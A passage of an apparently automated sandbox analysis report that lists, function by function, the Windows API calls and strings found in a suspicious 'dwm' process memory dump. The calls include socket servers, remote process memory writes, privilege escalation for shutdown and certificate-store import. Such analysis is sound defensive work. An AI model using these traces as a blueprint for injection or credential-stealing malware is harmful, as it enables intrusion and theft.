Part of subcall function 006464FD: bind.WS2_32(00000000,?,-0000001D), ref: 00646526
Part of subcall function 006464FD: listen.WS2_32(00000000,?), ref: 00646535
Part of subcall function 006464FD: #3.WS2_32(00000000,?,00634C21,7FFFFFFF,?,00000000,00000080), ref: 00646540

Part of subcall function 0064672E: accept.WS2_32(00000000,00000000,00000001), ref: 00646754

Part of subcall function 00646403: socket.WS2_32(?,00000001,00000006), ref: 0064640C
Part of subcall function 00646403: connect.WS2_32(00000000,?,-0000001D), ref: 0064642C
Part of subcall function 00646403: #3.WS2_32(00000000), ref: 00646437

Part of subcall function 006467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 006467CC

Part of subcall function 006465B7: recv.WS2_32(?,?,00000400,00000000), ref: 00646600
Part of subcall function 006465B7: #19.WS2_32(?,?,00000000,00000000), ref: 0064661A
Part of subcall function 006465B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00646657

Part of subcall function 0064675E: shutdown.WS2_32(?,00000002), ref: 00646766
Part of subcall function 0064675E: #3.WS2_32(?), ref: 0064676D

Part of subcall function 00640397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 006403BB
Part of subcall function 00640397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 006403CA

Strings

[, xrefs: 0064054E
<Mc, xrefs: 00640655, 0064061C, 0064056B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00639009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0063906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 006390BB

Part of subcall function 00648AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
Part of subcall function 00648AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A
Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1
Part of subcall function 00648AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
Part of subcall function 00648AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

&, xrefs: 006390A1
#, xrefs: 00639093

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006398B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0063991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063996B

Part of subcall function 00648AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
Part of subcall function 00648AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A
Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1
Part of subcall function 00648AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
Part of subcall function 00648AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

#, xrefs: 00639951
&, xrefs: 0063994A

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647A14, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 00647AB5

Strings

Local\, xrefs: 00647A9A
p.e, xrefs: 00647A41
Global\, xrefs: 00647A91

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006465B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58

APIs

recv.WS2_32(?,?,00000400,00000000), ref: 00646600
#19.WS2_32(?,?,00000000,00000000), ref: 0064661A
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00646657

Strings

<Mc, xrefs: 006465B7

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00642828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 006435C6: MultiByteToWideChar.KERNEL32(00642884,00000000,?,00641FF2,?,7718F8FF,00642884,00000000,00000032,?,7718F8FF,00000000), ref: 006435DD

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 006428A1

Strings

SOFTWARE\Microsoft, xrefs: 00642855
C:\Users\admin\AppData\Roaming, xrefs: 00642870, 00642888
.dat, xrefs: 0064289B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063E0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 0063E108
GetThreadDesktop.USER32(00000000), ref: 0063E10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0063E128

Part of subcall function 0063DD09: TlsAlloc.KERNEL32(00652868,00000000,0000018C,00000000,00000000), ref: 0063DD22
Part of subcall function 0063DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 0063DD4A
Part of subcall function 0063DD09: CreateEventW.KERNEL32(00652C30,00000001,00000000,?,84889912,?,00000001), ref: 0063DD74
Part of subcall function 0063DD09: CreateMutexW.KERNEL32(00652C30,00000000,?,18782822,?,00000001), ref: 0063DD97
Part of subcall function 0063DD09: CreateFileMappingW.KERNEL32(00000000,00652C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 0063DDC2
Part of subcall function 0063DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0063DDD8
Part of subcall function 0063DD09: GetDC.USER32(00000000), ref: 0063DDF5
Part of subcall function 0063DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 0063DE15
Part of subcall function 0063DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 0063DE1F
Part of subcall function 0063DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 0063DE32
Part of subcall function 0063DD09: ReleaseDC.USER32(00000000,?), ref: 0063DE56
Part of subcall function 0063DD09: CreateMutexW.KERNEL32(00652C30,00000000,?,1898B122,?,00000001,006528B8,?,00000102,006528A4,00652E70,00000010,?,?), ref: 0063DF00
Part of subcall function 0063DD09: GetDC.USER32(00000000), ref: 0063DF15
Part of subcall function 0063DD09: CreateCompatibleDC.GDI32(00000000), ref: 0063DF23
Part of subcall function 0063DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0063DF3A
Part of subcall function 0063DD09: SelectObject.GDI32(00000000,00000000), ref: 0063DF4D
Part of subcall function 0063DD09: ReleaseDC.USER32(00000000,00000001), ref: 0063DF65

Part of subcall function 0063DF74: DeleteObject.GDI32(00000000), ref: 0063DF87
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DF97
Part of subcall function 0063DF74: TlsFree.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFA2
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DFB0
Part of subcall function 0063DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,00652868,00000000,0063E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0063DFBA
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063DFC7
Part of subcall function 0063DF74: SelectObject.GDI32(00000000,00000000), ref: 0063DFE1
Part of subcall function 0063DF74: DeleteObject.GDI32(00000000), ref: 0063DFF2
Part of subcall function 0063DF74: DeleteDC.GDI32(00000000), ref: 0063DFFF
Part of subcall function 0063DF74: CloseHandle.KERNEL32(00000000), ref: 0063E010
Part of subcall function 0063DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0063E01F
Part of subcall function 0063DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 0063E038

Strings

N, xrefs: 0063E132

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006487C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 006487D7

Part of subcall function 006446F4: GetTickCount.KERNEL32(00648766,?), ref: 006446F4

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00648829

Strings

%s%08x, xrefs: 006487F2
tmp, xrefs: 006487ED

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006489C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 006489CD
GetFileAttributesW.KERNEL32(?,?,00000000,0064D261,?,?,?,?,?), ref: 006489F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0064D261,?,?,?,?,?), ref: 00648A03

Strings

.exe, xrefs: 006489C9

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063F367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0063F3CC

Part of subcall function 0064D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0064D34A
Part of subcall function 0064D325: PathRemoveFileSpecW.SHLWAPI(?), ref: 0064D35D
Part of subcall function 0064D325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0064D39B
Part of subcall function 0064D325: CharToOemW.USER32(?,?), ref: 0064D3B7
Part of subcall function 0064D325: CharToOemW.USER32(?,?), ref: 0064D3C6
Part of subcall function 0064D325: ExitProcess.KERNEL32(00000000), ref: 0064D41C

Part of subcall function 0063E959: CreateMutexW.KERNELBASE(00652C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00634E69,?,?,?,743C152E,00000002), ref: 0063E97F

ExitWindowsEx.USER32(00000014,80000000), ref: 0063F3DF

Part of subcall function 00644A87: GetCurrentThread.KERNEL32(00000020,00000000,0064C9A1,00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A97
Part of subcall function 00644A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644A9E
Part of subcall function 00644A87: OpenProcessToken.ADVAPI32(000000FF,00000020,0064C9A1,?,?,?,?,0064C9A1,SeTcbPrivilege), ref: 00644AB0
Part of subcall function 00644A87: LookupPrivilegeValueW.ADVAPI32(00000000,0064C9A1,?), ref: 00644AD4
Part of subcall function 00644A87: AdjustTokenPrivileges.ADVAPI32(0064C9A1,00000000,00000001,00000000,00000000,00000000), ref: 00644AE9
Part of subcall function 00644A87: GetLastError.KERNEL32 ref: 00644AF3
Part of subcall function 00644A87: CloseHandle.KERNEL32(0064C9A1), ref: 00644B02

Strings

SeShutdownPrivilege, xrefs: 0063F3AB
, xrefs: 0063F383

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00641E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 00641E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 00641E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 00641E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 00641E3D, 00641E42, 00641E59

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00641DBB,00000000,006422ED), ref: 00644BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00641DBB,00000000,006422ED), ref: 00644BDF

Strings

IsWow64Process, xrefs: 00644BD9
kernel32.dll, xrefs: 00644BCA

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064A24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(00653F24), ref: 0064A265
SetEvent.KERNEL32(?), ref: 0064A286
LeaveCriticalSection.KERNEL32(00653F24), ref: 0064A28D

Strings

3, xrefs: 0064A256

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00640AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 00640CB5

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

Part of subcall function 00644660: CryptAcquireContextW.ADVAPI32(00648C87,00000000,00000000,00000001,F0000040,00000000,00648C87,?,00000030,?,?,?,006491A0,?), ref: 00644679
Part of subcall function 00644660: CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,006491A0,?), ref: 00644691
Part of subcall function 00644660: CryptHashData.ADVAPI32(?,00000010), ref: 006446AD
Part of subcall function 00644660: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 006446C5
Part of subcall function 00644660: CryptDestroyHash.ADVAPI32(?), ref: 006446DC
Part of subcall function 00644660: CryptReleaseContext.ADVAPI32(?,00000000,?,?,006491A0,?), ref: 006446E6

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063A088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0063A12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0063A159
RegCloseKey.ADVAPI32(?), ref: 0063A28F

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

Part of subcall function 00647595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00649E26,?,?), ref: 006475AD

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0063A27C

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063A61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0063A6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0063A6D5
RegCloseKey.ADVAPI32(?), ref: 0063A80C

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

Part of subcall function 00647595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00649E26,?,?), ref: 006475AD

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0063A7F9

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064B265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0064B28C

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0064B2E0

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0064B343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0064B36F

Part of subcall function 0064B3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0064B437
Part of subcall function 0064B3EC: WriteFile.KERNEL32(0064B3D4,?,00000146,?,00000000), ref: 0064B475
Part of subcall function 0064B3EC: WriteFile.KERNEL32(0064B3D4,?,00000000,?,00000000), ref: 0064B499
Part of subcall function 0064B3EC: FlushFileBuffers.KERNEL32(0064B3D4), ref: 0064B4AD
Part of subcall function 0064B3EC: CloseHandle.KERNEL32(0064B3D4), ref: 0064B4B6

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(00630000,?), ref: 00647D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00647D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00630000,?,?,00000000,?,00000000), ref: 00647DE0

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00630000,?,?,00000000,?,00000000), ref: 00647E05

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00642542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 00647D14: IsBadReadPtr.KERNEL32(00630000,?), ref: 00647D30
Part of subcall function 00647D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 00647D4E
Part of subcall function 00647D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,00630000,?,?,00000000,?,00000000), ref: 00647DE0
Part of subcall function 00647D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00630000,?,?,00000000,?,00000000), ref: 00647E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00642574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0064316D,?,00000000,?,?,00000000), ref: 006425AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0064316D,?,00000000,?,?,00000000), ref: 006425CB

Part of subcall function 00641D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 00641D3B
Part of subcall function 00641D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,006425E9,00000000,?,?,?,?,0064316D,?), ref: 00641D4F
Part of subcall function 00641D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00641D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0064316D,?,00000000), ref: 0064261A

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(006315B0,00000000,00004401,006315A0,?), ref: 00649874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,006385BE,?,?), ref: 006498C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,006385BE,?,?), ref: 006498D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,006385BE,?,?), ref: 00649909

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00649372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 006486BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 006486D4

Part of subcall function 0064869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 006486B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 006493F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0064940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00649430
FlushFileBuffers.KERNEL32(?), ref: 00649438

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00635B40

Part of subcall function 00644DCA: CloseHandle.KERNEL32(00000000), ref: 00644DD9
Part of subcall function 00644DCA: CloseHandle.KERNEL32(00000000), ref: 00644DE2

Part of subcall function 00642828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 006428A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00635B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 00635BD6
TerminateProcess.KERNEL32(?,00000000), ref: 00635BE3

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00646B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 00646B4A
DispatchMessageW.USER32(?), ref: 00646B55
PeekMessageW.USER32(00000000), ref: 00646B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00646B79

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00644A3D
Thread32First.KERNEL32(00000000,?), ref: 00644A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 00644A6E
CloseHandle.KERNEL32(00000000), ref: 00644A79

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 006446F4: GetTickCount.KERNEL32(00648766,?), ref: 006446F4

CharUpperW.USER32(00000000), ref: 0064785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 00647759
.exe, xrefs: 00647745

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0064D664

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

GetSystemTime.KERNEL32(?), ref: 0064D6B0

Part of subcall function 0064D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0064D581,?,?,00000000), ref: 0064D43F

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Strings

.txt, xrefs: 0064D746

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064A594, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97

APIs

Part of subcall function 006454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 00645505
Part of subcall function 006454F1: GetLastError.KERNEL32 ref: 0064550F
Part of subcall function 006454F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0064552F

Part of subcall function 006455A1: HttpQueryInfoA.WININET(?,?,?,?,00000000), ref: 006455BA
Part of subcall function 006455A1: GetLastError.KERNEL32(?,00000000), ref: 006455C0
Part of subcall function 006455A1: HttpQueryInfoA.WININET(?,?,00000000,?,00000000), ref: 006455E2

HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0064A5F4

Part of subcall function 00645547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 0064555D
Part of subcall function 00645547: GetLastError.KERNEL32(?,0064A663,?,0000001C,?,00000000,00000048), ref: 00645567
Part of subcall function 00645547: InternetQueryOptionW.WININET(0000001C,0000001C,00000000,?), ref: 00645589

